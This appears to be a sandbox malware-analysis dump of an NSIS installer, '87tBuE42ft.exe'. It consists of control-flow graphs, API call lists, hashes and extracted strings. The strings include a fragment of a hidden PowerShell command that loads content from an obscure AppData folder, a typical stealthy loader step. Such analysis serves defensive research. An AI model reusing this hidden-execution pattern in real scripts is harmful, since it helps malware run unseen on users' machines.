lstrlenW lstrlenW 4569->4570 4574 402329 4569->4574 4572 405707 28 API calls 4570->4572 4571 405707 28 API calls 4575 402331 4571->4575 4573 402374 SHFileOperationW 4572->4573 4573->4574 4573->4575 4574->4571 4574->4575 4583 401d86 4584 401d99 GetDlgItem 4583->4584 4585 401d8c 4583->4585 4587 401d93 4584->4587 4586 402d89 21 API calls 4585->4586 4586->4587 4588 401dda GetClientRect LoadImageW SendMessageW 4587->4588 4589 402dab 21 API calls 4587->4589 4591 401e38 4588->4591 4593 401e44 4588->4593 4589->4588 4592 401e3d DeleteObject 4591->4592 4591->4593 4592->4593 4594 402388 4595 40238f 4594->4595 4598 4023a2 4594->4598 4596 4066bf 21 API calls 4595->4596 4597 40239c 4596->4597 4599 405ce2 MessageBoxIndirectW 4597->4599 4599->4598 4600 402c0a SendMessageW 4601 402c24 InvalidateRect 4600->4601 4602 402c2f 4600->4602 4601->4602 4603 40248f 4604 402dab 21 API calls 4603->4604 4605 4024a1 4604->4605 4606 402dab 21 API calls 4605->4606 4607 4024ab 4606->4607 4620 402e3b 4607->4620 4610 4024e3 4613 4024ef 4610->4613 4614 402d89 21 API calls 4610->4614 4611 402933 4612 402dab 21 API calls 4616 4024d9 lstrlenW 4612->4616 4615 40250e RegSetValueExW 4613->4615 4617 403376 48 API calls 4613->4617 4614->4613 4618 402524 RegCloseKey 4615->4618 4616->4610 4617->4615 4618->4611 4621 402e56 4620->4621 4624 40651d 4621->4624 4625 40652c 4624->4625 4626 4024bb 4625->4626 4627 406537 RegCreateKeyExW 4625->4627 4626->4610 4626->4611 4626->4612 4627->4626 4628 402910 4629 402dab 21 API calls 4628->4629 4630 402917 FindFirstFileW 4629->4630 4631 40292a 4630->4631 4632 40293f 4630->4632 4636 4065c9 wsprintfW 4632->4636 4634 402948 4637 406682 lstrcpynW 4634->4637 4636->4634 4637->4631 4638 401911 4639 401948 4638->4639 4640 402dab 21 API calls 4639->4640 4641 40194d 4640->4641 4642 405d8e 71 API calls 4641->4642 4643 401956 4642->4643 4644 401491 4645 405707 28 API calls 4644->4645 4646 401498 4645->4646 4647 403d12 4648 403d1d 4647->4648 4649 403d21 4648->4649 4650 403d24 GlobalAlloc 4648->4650 4650->4649 4658 401914 4659 402dab 21 API calls 4658->4659 4660 40191b 4659->4660 4661 405ce2 MessageBoxIndirectW 4660->4661 4662 401924 4661->4662 4663 402896 4664 40289d 4663->4664 4665 402bae 4663->4665 4666 402d89 21 API calls 4664->4666 4667 4028a4 4666->4667 4668 4028b3 SetFilePointer 4667->4668 4668->4665 4669 4028c3 4668->4669 4671 4065c9 wsprintfW 4669->4671 4671->4665 4672 401f17 4673 402dab 21 API calls 4672->4673 4674 401f1d 4673->4674 4675 402dab 21 API calls 4674->4675 4676 401f26 4675->4676 4677 402dab 21 API calls 4676->4677 4678 401f2f 4677->4678 4679 402dab 21 API calls 4678->4679 4680 401f38 4679->4680 4681 401423 28 API calls 4680->4681 4682 401f3f 4681->4682 4689 405ca8 ShellExecuteExW 4682->4689 4684 401f87 4685 406b21 5 API calls 4684->4685 4686 402933 4684->4686 4687 401fa4 CloseHandle 4685->4687 4687->4686 4689->4684 4690 402f98 4691 402faa SetTimer 4690->4691 4693 402fc3 4690->4693 4691->4693 4692 403011 4693->4692 4694 403017 MulDiv 4693->4694 4695 402fd1 wsprintfW SetWindowTextW SetDlgItemTextW 4694->4695 4695->4692 4697 401d1c 4698 402d89 21 API calls 4697->4698 4699 401d22 IsWindow 4698->4699 4700 401a25 4699->4700 4701 40149e 4702 4023a2 4701->4702 4703 4014ac PostQuitMessage 4701->4703 4703->4702 4704 401ba0 4705 401bf1 4704->4705 4709 401bad 4704->4709 4706 401c1b GlobalAlloc 4705->4706 4710 401bf6 4705->4710 4707 4066bf 21 API calls 4706->4707 4711 401c36 4707->4711 4708 4066bf 21 API calls 4712 40239c 4708->4712 4709->4711 4713 401bc4 4709->4713 4717 4023a2 4710->4717 4725 406682 lstrcpynW 4710->4725 4711->4708 4711->4717 4719 405ce2 MessageBoxIndirectW 4712->4719 4723 406682 lstrcpynW 4713->4723 4716 401c08 GlobalFree 4716->4717 4718 401bd3 4724 406682 lstrcpynW 4718->4724 4719->4717 4721 401be2 4726 406682 lstrcpynW 4721->4726 4723->4718 4724->4721 4725->4716 4726->4717 4727 406da0 4731 406c24 4727->4731 4728 40758f 4729 406ca5 GlobalFree 4730 406cae GlobalAlloc 4729->4730 4730->4728 4730->4731 4731->4728 4731->4729 4731->4730 4732 406d25 GlobalAlloc 4731->4732 4733 406d1c GlobalFree 4731->4733 4732->4728 4732->4731 4733->4732 4734 402621 4735 402dab 21 API calls 4734->4735 4736 402628 4735->4736 4739 406172 GetFileAttributesW CreateFileW 4736->4739 4738 402634 4739->4738 4740 4025a3 4750 402deb 4740->4750 4743 402d89 21 API calls 4744 4025b6 4743->4744 4745 4025d2 RegEnumKeyW 4744->4745 4746 4025de RegEnumValueW 4744->4746 4747 402933 4744->4747 4748 4025f3 RegCloseKey 4745->4748 4746->4748 4748->4747 4751 402dab 21 API calls 4750->4751 4752 402e02 4751->4752 4753 4064ef RegOpenKeyExW 4752->4753 4754 4025ad 4753->4754 4754->4743 3910 4015a8 3911 402dab 21 API calls 3910->3911 3912 4015af SetFileAttributesW 3911->3912 3913 4015c1 3912->3913 3914 405ca8 ShellExecuteExW 3915 401fa9 3916 402dab 21 API calls 3915->3916 3917 401faf 3916->3917 3918 405707 28 API calls 3917->3918 3919 401fb9 3918->3919 3920 405c65 2 API calls 3919->3920 3921 401fbf 3920->3921 3922 402933 3921->3922 3929 401fe2 CloseHandle 3921->3929 3930 406b21 WaitForSingleObject 3921->3930 3925 401fd4 3926 401fe4 3925->3926 3927 401fd9 3925->3927 3926->3929 3935 4065c9 wsprintfW 3927->3935 3929->3922 3931 406b3b 3930->3931 3932 406b4d GetExitCodeProcess 3931->3932 3933 406ab2 2 API calls 3931->3933 3932->3925 3934 406b42 WaitForSingleObject 3933->3934 3934->3931 3935->3929 4762 404aab 4763 404ae1 4762->4763 4764 404abb 4762->4764 4766 404668 8 API calls 4763->4766 4765 404601 22 API calls 4764->4765 4767 404ac8 SetDlgItemTextW 4765->4767 4768 404aed 4766->4768 4767->4763 3936 4021af 3937 402dab 21 API calls 3936->3937 3938 4021b6 3937->3938 3939 402dab 21 API calls 3938->3939 3940 4021c0 3939->3940 3941 402dab 21 API calls 3940->3941 3942 4021ca 3941->3942 3943 402dab 21 API calls 3942->3943 3944 4021d4 3943->3944 3945 402dab 21 API calls 3944->3945 3946 4021de 3945->3946 3947 40221d CoCreateInstance 3946->3947 3948 402dab 21 API calls 3946->3948 3949 40223c 3947->3949 3948->3947 3950 401423 28 API calls 3949->3950 3951 4022fb 3949->3951 3950->3951 4769 40202f 4770 402dab 21 API calls 4769->4770 4771 402036 4770->4771 4772 406a76 5 API calls 4771->4772 4773 402045 4772->4773 4774 402061 GlobalAlloc 4773->4774 4775 4020d1 4773->4775 4774->4775 4776 402075 4774->4776 4777 406a76 5 API calls 4776->4777 4778 40207c 4777->4778 4779 406a76 5 API calls 4778->4779 4780 402086 4779->4780 4780->4775 4784 4065c9 wsprintfW 4780->4784 4782 4020bf 4785 4065c9 wsprintfW 4782->4785 4784->4782 4785->4775 4786 40252f 4787 402deb 21 API calls 4786->4787 4788 402539 4787->4788 4789 402dab 21 API calls 4788->4789 4790 402542 4789->4790 4791 40254d RegQueryValueExW 4790->4791 4794 402933 4790->4794 4792 402573 RegCloseKey 4791->4792 4793 40256d 4791->4793 4792->4794 4793->4792 4797 4065c9 wsprintfW 4793->4797 4797->4792 4798 401a35 4799 402dab 21 API calls 4798->4799 4800 401a3e ExpandEnvironmentStringsW 4799->4800 4801 401a52 4800->4801 4803 401a65 4800->4803 4802 401a57 lstrcmpW 4801->4802 4801->4803 4802->4803 4001 4023b7 4002 4023c5 4001->4002 4003 4023bf 4001->4003 4005 4023d3 4002->4005 4007 402dab 21 API calls 4002->4007 4004 402dab 21 API calls 4003->4004 4004->4002 4006 4023e1 4005->4006 4008 402dab 21 API calls 4005->4008 4009 402dab 21 API calls 4006->4009 4007->4005 4008->4006 4010 4023ea WritePrivateProfileStringW 4009->4010 4804 404737 lstrcpynW lstrlenW 4810 4014b8 4811 4014be 4810->4811 4812 401389 2 API calls 4811->4812 4813 4014c6 4812->4813 4814 402439 4815 402441 4814->4815 4816 40246c 4814->4816 4817 402deb 21 API calls 4815->4817 4818 402dab 21 API calls 4816->4818 4819 402448 4817->4819 4820 402473 4818->4820 4822 402480 4819->4822 4823 402dab 21 API calls 4819->4823 4825 402e69 4820->4825 4824 402459 RegDeleteValueW RegCloseKey 4823->4824 4824->4822 4826 402e7d 4825->4826 4827 402e76 4825->4827 4826->4827 4829 402eae 4826->4829 4827->4822 4830 4064ef RegOpenKeyExW 4829->4830 4831 402edc 4830->4831 4832 402f86 4831->4832 4833 402eec RegEnumValueW 4831->4833 4837 402f0f 4831->4837 4832->4827 4834 402f76 RegCloseKey 4833->4834 4833->4837 4834->4832 4835 402f4b RegEnumKeyW 4836 402f54 RegCloseKey 4835->4836 4835->4837 4838 406a76 5 API calls 4836->4838 4837->4834 4837->4835 4837->4836 4839 402eae 6 API calls 4837->4839 4840 402f64 4838->4840 4839->4837 4840->4832 4841 402f68 RegDeleteKeyW 4840->4841 4841->4832 4842 40173a 4843 402dab 21 API calls 4842->4843 4844 401741 SearchPathW 4843->4844 4845 40175c 4844->4845 4846 401d3d 4847 402d89 21 API calls 4846->4847 4848 401d44 4847->4848 4849 402d89 21 API calls 4848->4849 4850 401d50 GetDlgItem 4849->4850 4851 40263d 4850->4851

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 0 403645-403697 SetErrorMode GetVersionExW 1 4036d1-4036d6 0->1 2 403699-4036c9 GetVersionExW 0->2 3 4036d8 1->3 4 4036de-403720 1->4 2->1 3->4 5 403722-40372a call 406a76 4->5 6 403733 4->6 5->6 11 40372c 5->11 8 403738-40374c call 406a06 lstrlenA 6->8 13 40374e-40376a call 406a76 * 3 8->13 11->6 20 40377b-4037df #17 OleInitialize SHGetFileInfoW call 406682 GetCommandLineW call 406682 13->20 21 40376c-403772 13->21 28 4037e1-4037e3 20->28 29 4037e8-4037fc call 405f7e CharNextW 20->29 21->20 25 403774 21->25 25->20 28->29 32 4038f7-4038fd 29->32 33 403801-403807 32->33 34 403903 32->34 35 403810-403817 33->35 36 403809-40380e 33->36 37 403917-403931 GetTempPathW call 403614 34->37 38 403819-40381e 35->38 39 40381f-403823 35->39 36->35 36->36 47 403933-403951 GetWindowsDirectoryW lstrcatW call 403614 37->47 48 403989-4039a3 DeleteFileW call 4030d5 37->48 38->39 41 4038e4-4038f3 call 405f7e 39->41 42 403829-40382f 39->42 41->32 59 4038f5-4038f6 41->59 45 403831-403838 42->45 46 403849-403882 42->46 52 40383a-40383d 45->52 53 40383f 45->53 54 403884-403889 46->54 55 40389f-4038d9 46->55 47->48 62 403953-403983 GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 403614 47->62 64 403b90-403ba0 call 403c62 OleUninitialize 48->64 65 4039a9-4039af 48->65 52->46 52->53 53->46 54->55 61 40388b-403893 54->61 57 4038e1-4038e3 55->57 58 4038db-4038df 55->58 57->41 58->57 63 403905-403912 call 406682 58->63 59->32 66 403895-403898 61->66 67 40389a 61->67 62->48 62->64 63->37 77 403ba2-403bb2 call 405ce2 ExitProcess 64->77 78 403bc6-403bcc 64->78 70 4039b5-4039c0 call 405f7e 65->70 71 403a48-403a4f call 403d54 65->71 66->55 66->67 67->55 82 4039c2-4039f7 70->82 83 403a0e-403a18 70->83 80 403a54-403a58 71->80 84 403c4a-403c52 78->84 85 403bce-403be4 GetCurrentProcess OpenProcessToken 78->85 80->64 91 4039f9-4039fd 82->91 86 403a1a-403a28 call 406059 83->86 87 403a5d-403a83 call 405c4d lstrlenW call 406682 83->87 88 403c54 84->88 89 403c58-403c5c ExitProcess 84->89 92 403be6-403c14 LookupPrivilegeValueW AdjustTokenPrivileges 85->92 93 403c1a-403c28 call 406a76 85->93 86->64 106 403a2e-403a44 call 406682 * 2 86->106 110 403a94-403aac 87->110 111 403a85-403a8f call 406682 87->111 88->89 97 403a06-403a0a 91->97 98 4039ff-403a04 91->98 92->93 104 403c36-403c41 ExitWindowsEx 93->104 105 403c2a-403c34 93->105 97->91 99 403a0c 97->99 98->97 98->99 99->83 104->84 108 403c43-403c45 call 40140b 104->108 105->104 105->108 106->71 108->84 116 403ab1-403ab5 110->116 111->110 118 403aba-403ae4 wsprintfW call 4066bf 116->118 122 403ae6-403aeb call 405bd6 118->122 123 403aed call 405c30 118->123 127 403af2-403af4 122->127 123->127 128 403b30-403b4f SetCurrentDirectoryW call 406442 CopyFileW 127->128 129 403af6-403b00 GetFileAttributesW 127->129 137 403b51-403b72 call 406442 call 4066bf call 405c65 128->137 138 403b8e 128->138 130 403b21-403b2c 129->130 131 403b02-403b0b DeleteFileW 129->131 130->116 134 403b2e 130->134 131->130 133 403b0d-403b1f call 405d8e 131->133 133->118 133->130 134->64 146 403b74-403b7e 137->146 147 403bb8-403bc4 CloseHandle 137->147 138->64 146->138 148 403b80-403b88 call 4069df 146->148 147->138 148->118 148->138
                                                  APIs
                                                  • SetErrorMode.KERNELBASE ref: 00403668
                                                  • GetVersionExW.KERNEL32(?,?,?,?,?,?,?,?), ref: 00403693
                                                  • GetVersionExW.KERNEL32(?,?,?,?,?,?,?,?,?), ref: 004036A6
                                                  • lstrlenA.KERNEL32(UXTHEME,UXTHEME,?,?,?,?,?,?,?,?), ref: 0040373F
                                                  • #17.COMCTL32(?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 0040377C
                                                  • OleInitialize.OLE32(00000000), ref: 00403783
                                                  • SHGetFileInfoW.SHELL32(00420F08,00000000,?,000002B4,00000000), ref: 004037A2
                                                  • GetCommandLineW.KERNEL32(00428A60,NSIS Error,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 004037B7
                                                  • CharNextW.USER32(00000000,"C:\Users\user\Desktop\87tBuE42ft.exe",00000020,"C:\Users\user\Desktop\87tBuE42ft.exe",00000000,?,00000008,0000000A,0000000C), ref: 004037F0
                                                  • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00008001,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403928
                                                  • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403939
                                                  • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403945
                                                  • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403959
                                                  • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 00403961
                                                  • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403972
                                                  • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 0040397A
                                                  • DeleteFileW.KERNELBASE(1033,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 0040398E
                                                  • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\87tBuE42ft.exe",00000000,?,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403A67
                                                    • Part of subcall function 00406682: lstrcpynW.KERNEL32(?,?,00000400,004037B7,00428A60,NSIS Error,?,00000008,0000000A,0000000C), ref: 0040668F
                                                  • wsprintfW.USER32 ref: 00403AC4
                                                  • GetFileAttributesW.KERNEL32(0042C800,C:\Users\user\AppData\Local\Temp\), ref: 00403AF7
                                                  • DeleteFileW.KERNEL32(0042C800), ref: 00403B03
                                                  • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 00403B31
                                                    • Part of subcall function 00406442: MoveFileExW.KERNEL32(?,?,00000005,00405F40,?,00000000,000000F1,?,?,?,?,?), ref: 0040644C
                                                  • CopyFileW.KERNEL32(00437800,0042C800,00000001,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00403B47
                                                    • Part of subcall function 00405C65: CreateProcessW.KERNELBASE(00000000,0042C800,00000000,00000000,00000000,04000000,00000000,00000000,00425F50,?,?,?,0042C800,?), ref: 00405C8E
                                                    • Part of subcall function 00405C65: CloseHandle.KERNEL32(?,?,?,0042C800,?), ref: 00405C9B
                                                    • Part of subcall function 004069DF: FindFirstFileW.KERNELBASE(74DF3420,00425F98,00425750,004060A2,00425750,00425750,00000000,00425750,00425750,74DF3420,?,74DF2EE0,00405DAE,?,74DF3420,74DF2EE0), ref: 004069EA
                                                    • Part of subcall function 004069DF: FindClose.KERNEL32(00000000), ref: 004069F6
                                                  • OleUninitialize.OLE32(?,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403B95
                                                  • ExitProcess.KERNEL32 ref: 00403BB2
                                                  • CloseHandle.KERNEL32(00000000,0042D000,0042D000,?,0042C800,00000000), ref: 00403BB9
                                                  • GetCurrentProcess.KERNEL32(00000028,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403BD5
                                                  • OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,?,?,?), ref: 00403BDC
                                                  • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403BF1
                                                  • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?), ref: 00403C14
                                                  • ExitWindowsEx.USER32(00000002,80040002), ref: 00403C39
                                                  • ExitProcess.KERNEL32 ref: 00403C5C
                                                    • Part of subcall function 00405C30: CreateDirectoryW.KERNELBASE(?,00000000,00403638,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040392F,?,00000008,0000000A,0000000C), ref: 00405C36
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1782662054.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1782642464.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782687459.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782823907.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_87tBuE42ft.jbxd
                                                  Similarity
                                                  • API ID: File$Process$CloseDirectoryExit$CreateCurrentDeleteEnvironmentFindHandlePathTempTokenVariableVersionWindowslstrcatlstrlen$AdjustAttributesCharCommandCopyErrorFirstInfoInitializeLineLookupModeMoveNextOpenPrivilegePrivilegesUninitializeValuelstrcpynwsprintf
                                                  • String ID: "C:\Users\user\Desktop\87tBuE42ft.exe"$-windowstyle hidden ; $limpiness=Get-Content 'C:\Users\user\AppData\Roaming\Usitative\healthless\hovedanpartshaver\ravnemorens\Fr$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\Usitative\healthless\hovedanpartshaver$C:\Users\user\AppData\Roaming\Usitative\healthless\hovedanpartshaver\Cricotomy66\Refleksivs$C:\Users\user\Desktop$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu%X.tmp
                                                  • API String ID: 1813718867-2590737665
                                                  • Opcode ID: bb71d17fa1f5f56b03cc391053e80ea16fdd14c8ff94dcd4e52228abc8ea1a3b
                                                  • Instruction ID: d2a3103bd0adf94391fd0ebfa47e937d37e61a7cc597b22c14a72094b2238e17
                                                  • Opcode Fuzzy Hash: bb71d17fa1f5f56b03cc391053e80ea16fdd14c8ff94dcd4e52228abc8ea1a3b
                                                  • Instruction Fuzzy Hash: 4CF1E531604300AAD320AF759D05B2B7EE8AB8570AF11483FF585B22D1DB7C9A41CB6E
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 151 405846-405861 152 4059f0-4059f7 151->152 153 405867-40592e GetDlgItem * 3 call 404636 call 404f8f GetClientRect GetSystemMetrics SendMessageW * 2 151->153 155 405a21-405a2e 152->155 156 4059f9-405a1b GetDlgItem CreateThread FindCloseChangeNotification 152->156 171 405930-40594a SendMessageW * 2 153->171 172 40594c-40594f 153->172 157 405a30-405a36 155->157 158 405a4c-405a56 155->158 156->155 160 405a71-405a7a call 404668 157->160 161 405a38-405a47 ShowWindow * 2 call 404636 157->161 162 405a58-405a5e 158->162 163 405aac-405ab0 158->163 175 405a7f-405a83 160->175 161->158 168 405a60-405a6c call 4045da 162->168 169 405a86-405a96 ShowWindow 162->169 163->160 166 405ab2-405ab8 163->166 166->160 173 405aba-405acd SendMessageW 166->173 168->160 176 405aa6-405aa7 call 4045da 169->176 177 405a98-405aa1 call 405707 169->177 171->172 178 405951-40595d SendMessageW 172->178 179 40595f-405976 call 404601 172->179 180 405ad3-405afe CreatePopupMenu call 4066bf AppendMenuW 173->180 181 405bcf-405bd1 173->181 176->163 177->176 178->179 190 405978-40598c ShowWindow 179->190 191 4059ac-4059cd GetDlgItem SendMessageW 179->191 188 405b00-405b10 GetWindowRect 180->188 189 405b13-405b28 TrackPopupMenu 180->189 181->175 188->189 189->181 192 405b2e-405b45 189->192 193 40599b 190->193 194 40598e-405999 ShowWindow 190->194 191->181 195 4059d3-4059eb SendMessageW * 2 191->195 196 405b4a-405b65 SendMessageW 192->196 197 4059a1-4059a7 call 404636 193->197 194->197 195->181 196->196 198 405b67-405b8a OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 196->198 197->191 200 405b8c-405bb3 SendMessageW 198->200 200->200 201 405bb5-405bc9 GlobalUnlock SetClipboardData CloseClipboard 200->201 201->181
                                                  APIs
                                                  • GetDlgItem.USER32(?,00000403), ref: 004058A4
                                                  • GetDlgItem.USER32(?,000003EE), ref: 004058B3
                                                  • GetClientRect.USER32(?,?), ref: 004058F0
                                                  • GetSystemMetrics.USER32(00000002), ref: 004058F7
                                                  • SendMessageW.USER32(?,00001061,00000000,?), ref: 00405918
                                                  • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 00405929
                                                  • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 0040593C
                                                  • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 0040594A
                                                  • SendMessageW.USER32(?,00001024,00000000,?), ref: 0040595D
                                                  • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040597F
                                                  • ShowWindow.USER32(?,00000008), ref: 00405993
                                                  • GetDlgItem.USER32(?,000003EC), ref: 004059B4
                                                  • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 004059C4
                                                  • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004059DD
                                                  • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004059E9
                                                  • GetDlgItem.USER32(?,000003F8), ref: 004058C2
                                                    • Part of subcall function 00404636: SendMessageW.USER32(00000028,?,00000001,00404461), ref: 00404644
                                                  • GetDlgItem.USER32(?,000003EC), ref: 00405A06
                                                  • CreateThread.KERNELBASE(00000000,00000000,Function_000057DA,00000000), ref: 00405A14
                                                  • FindCloseChangeNotification.KERNELBASE(00000000), ref: 00405A1B
                                                  • ShowWindow.USER32(00000000), ref: 00405A3F
                                                  • ShowWindow.USER32(?,00000008), ref: 00405A44
                                                  • ShowWindow.USER32(00000008), ref: 00405A8E
                                                  • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405AC2
                                                  • CreatePopupMenu.USER32 ref: 00405AD3
                                                  • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405AE7
                                                  • GetWindowRect.USER32(?,?), ref: 00405B07
                                                  • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405B20
                                                  • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405B58
                                                  • OpenClipboard.USER32(00000000), ref: 00405B68
                                                  • EmptyClipboard.USER32 ref: 00405B6E
                                                  • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405B7A
                                                  • GlobalLock.KERNEL32(00000000), ref: 00405B84
                                                  • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405B98
                                                  • GlobalUnlock.KERNEL32(00000000), ref: 00405BB8
                                                  • SetClipboardData.USER32(0000000D,00000000), ref: 00405BC3
                                                  • CloseClipboard.USER32 ref: 00405BC9
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1782662054.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1782642464.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782687459.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782823907.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_87tBuE42ft.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendChangeClientDataEmptyFindLockMetricsNotificationOpenSystemThreadTrackUnlock
                                                  • String ID: H/B${
                                                  • API String ID: 4154960007-332483393
                                                  • Opcode ID: 4ad71a5ae84d1442ca64332f301171ed24ad3ca4da0b040a8c0bb5ec3df77bcf
                                                  • Instruction ID: 1bfd88ad0a039f30930ce625e3f17186fc56f4394c79b8c388f8475f2b475093
                                                  • Opcode Fuzzy Hash: 4ad71a5ae84d1442ca64332f301171ed24ad3ca4da0b040a8c0bb5ec3df77bcf
                                                  • Instruction Fuzzy Hash: A7B127B1900608FFDB21AF60DD85DAE7B79FB44354F00413AFA41A61A0CB795E52DF68
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 685 406da0-406da5 686 406e16-406e34 685->686 687 406da7-406dd6 685->687 688 40740c-407421 686->688 689 406dd8-406ddb 687->689 690 406ddd-406de1 687->690 694 407423-407439 688->694 695 40743b-407451 688->695 691 406ded-406df0 689->691 692 406de3-406de7 690->692 693 406de9 690->693 697 406df2-406dfb 691->697 698 406e0e-406e11 691->698 692->691 693->691 696 407454-40745b 694->696 695->696 701 407482-40748e 696->701 702 40745d-407461 696->702 699 406e00-406e0c 697->699 700 406dfd 697->700 703 406fe3-407001 698->703 707 406e76-406ea4 699->707 700->699 710 406c24-406c2d 701->710 708 407610-40761a 702->708 709 407467-40747f 702->709 705 407003-407017 703->705 706 407019-40702b 703->706 714 40702e-407038 705->714 706->714 712 406ec0-406eda 707->712 713 406ea6-406ebe 707->713 711 407626-407639 708->711 709->701 718 406c33 710->718 719 40763b 710->719 720 40763e-407642 711->720 715 406edd-406ee7 712->715 713->715 716 40703a 714->716 717 406fdb-406fe1 714->717 722 406eed 715->722 723 406e5e-406e64 715->723 724 406fb6-406fba 716->724 725 40714b-407158 716->725 717->703 721 406f7f-406f89 717->721 726 406c3a-406c3e 718->726 727 406d7a-406d9b 718->727 728 406cdf-406ce3 718->728 729 406d4f-406d53 718->729 719->720 732 4075ce-4075d8 721->732 733 406f8f-406fb1 721->733 743 406e43-406e5b 722->743 744 4075aa-4075b4 722->744 734 406f17-406f1d 723->734 735 406e6a-406e70 723->735 736 406fc0-406fd8 724->736 737 4075c2-4075cc 724->737 725->710 741 4071a7-4071b6 725->741 726->711 742 406c44-406c51 726->742 727->688 739 406ce9-406d02 728->739 740 40758f-407599 728->740 730 406d59-406d6d 729->730 731 40759e-4075a8 729->731 745 406d70-406d78 730->745 